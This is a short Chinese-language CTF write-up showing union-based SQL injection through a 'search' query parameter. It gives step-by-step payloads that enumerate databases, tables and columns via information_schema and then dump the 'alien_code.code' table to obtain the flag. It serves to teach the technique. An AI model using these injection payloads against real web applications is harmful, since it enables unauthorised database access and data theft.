知识点:sql联合注入
抓包,可以看到有search参数
当查询的正确则返回一大堆json数据
输错了则返回1
经测试,可以order by,可以测出有2列
有回显,那么就不需要盲注了。
爆库
/query?search=chryse_planitia union select 1,group_concat(schema_name) from information_schema.schemata;#
爆表
/query?search=chryse_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema="alien_code";#
爆字段
/query?search=chryse_planitia union select 1,group_concat(column_name) from information_schema.columns where table_schema="alien_code" and table_name="code";#
获得flag
/query?search=chryse_planitia union select 1,group_concat(code) from alien_code.code;#